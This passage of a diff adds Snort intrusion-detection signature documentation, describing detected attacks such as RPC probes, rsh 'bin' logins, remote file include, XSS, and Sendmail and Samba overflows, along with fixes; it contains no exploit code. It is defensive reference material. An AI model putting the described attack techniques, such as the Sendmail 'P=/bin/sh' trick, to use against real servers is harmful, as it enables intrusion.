+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+BugTraq:
+http://www.securityfocus.com/bid/1892
+
+--
--- /dev/null
+++ b/doc/signatures/1431.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 1431
+
+--
+Summary:
+This event is generated when packets with the SYN flag set are sent to 
+multicast addresses.
+
+--
+Impact:
+Possible reconnaisance or evidence of a Denial of Service (DoS) attack.
+
+--
+Detailed Information:
+Under normal circumstances packets with the SYN flag set should not be 
+sent to multicast addresses.
+
+If the attacker has spoofed a multicast address when sending a SYN flood
+attack this traffic will be seen.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker may have intiated an attack and could have spoofed a 
+multicast address as the source.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Employ filtering at the firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/607.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 607
+
+--
+Summary: 
+This event is generated when an attempt to login using the "bin" account is made.
+
+--
+Impact: 
+An attacker may have gained the ability to initiate a remote interactive session on the server.
+
+--
+Detailed Information: 
+This event is generated when a connection using the "bin" account via  "rsh" is attempted. 
+
+This activity is indicative of attempts to abuse hosts using a default configuration. 
+
+Some UNIX systems used to ship with "bin" account enabled and no password required. Similarly, the "rshd" service was also enabled. This allowed an attacker to connect to the machine and establish an interactive session using the "bin" account.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with default account "bin" and "rshd" service running and connects to it, then escalates his privileges to "root"
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+If a local username is not the same as the remote one ("bin"), the rule will not generate an event.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS384
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0651
+
+--
--- /dev/null
+++ b/doc/signatures/542.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+542
+
+--
+Summary:
+This event is generated when activity relating to network chat clients
+is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown
+external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow
+users to transfer files directly between hosts. This can allow malicious
+users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain
+unauthorized access to a host.
+
+This event indicates that an IRC nickname change has been made from a
+client originating from the protected network to an IRC server external
+to the protected network.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party
+using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access
+to a host, then upload a Trojan Horse program to gain control of that
+host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or
+implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+IRC Protocol:
+http://www.irchelp.org/irchelp/rfc/
+
+--
--- /dev/null
+++ b/doc/signatures/2952.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2952
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000503.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000503
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Nucleus CMS" application running on a webserver. 
+Access to the file "action.php" using a remote file being passed as the 
+"DIR_LIB" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DIR_LIB" parameter in the "action.php" script used by 
+the "Nucleus CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Nucleus CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000540.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000540
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Enterprise Groupware" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "module" parameter in the "index.php" script 
+used by the "Enterprise Groupware" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Enterprise Groupware
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1031.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1031
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1224.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1224
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/284.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 
+284
+
+--
+Summary:
+This event generated when an attempt is made to exploit a buffer overflow in the pop2 service.
+
+--
+Impact: 
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable host with the privileges of the user "nobody".
+
+--
+Detailed Information:
+Access to the user "nobody" can be obtained with pop2 or pop3 servers that support "anonymous proxy".  "Anonymous proxy" permits the use of a proxy pop server to access mail on another pop server where the user has a valid account.  This access to the proxy server as user "nobody".  A buffer overflow exists because of improper user input filtering, allowing the attacker to enter an overly long argment to the FOLD command.  This may permit the execution of arbitrary commands on the vulernable server with the privileges of the user "nobody".
+
+--
+Affected Systems:
+Debian Linux 2.1
+Redhat Linux 4.2, 5.0, 5.1, and 5.2
+University of Washington imap 4.4
+University of Washington pop2d 4.4
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable pop2 server, permitting the execution of arbitrary commands with the privilege of user "nobody". 
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the pop2d version 4.51 or later. 
+
+Compile pop2d to not support anonymous proxing.
+
+--
+Contributors:
+Original rule writer unknown
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/283
+
+--
--- /dev/null
+++ b/doc/signatures/100000760.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000760
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "The Banner Engine" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "text" parameter in the "top.php" script used by the "The Banner Engine" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using The Banner Engine
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1396.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1396
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/668.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+668
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a vulnerability in Sendmail, where tab characters in ident messages are not properly parsed.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Sendmail 8.6.10 and earlier versions contain a vulnerability related to the parsing of tab characters in commands passed from ident to Sendmail. An attacker can use a specially crafted command with tabs in an ident response to Sendmail. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. 
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email with tab characters and includes a path variable of P=/bin/sh. Directives included in the transmission are executed while the message remains in the Sendmail queue.
+
+--
+Ease of Attack:
+Moderate. Multiple exploits exist, but the window of opportunity is small; the vulnerability must be exploited while the message is queued for delivery and must have sufficient time (the mail server must be busy/slow) to execute the commands.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
--- /dev/null
+++ b/doc/signatures/1869.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1869
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2144.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2144
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the cafelog php application. 
+
+--
+Impact:
+Possible arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the cafelog PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL, the script is processed and executed with the privileges of the user running the webserver. This is due to poor checking of user supplied variables in the gm-2-b2.php script.
+
+--
+Affected Systems:
+Any host using cafelog.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script via gm-2-b2.php.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000444.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000444
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiraksGalerie" application running on a webserver. Access to the file "galsecurity.lib.php" using a remote file being passed as the "listconfigfile[0]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "listconfigfile[0]" parameter in the "galsecurity.lib.php" script used by the "MiraksGalerie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiraksGalerie
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3203.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3203
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3033.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3033
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2264.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2264
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
--- /dev/null
+++ b/doc/signatures/1136.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1136
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000682.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000682
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "email.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "email.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1719.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1719
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1573.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1573
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
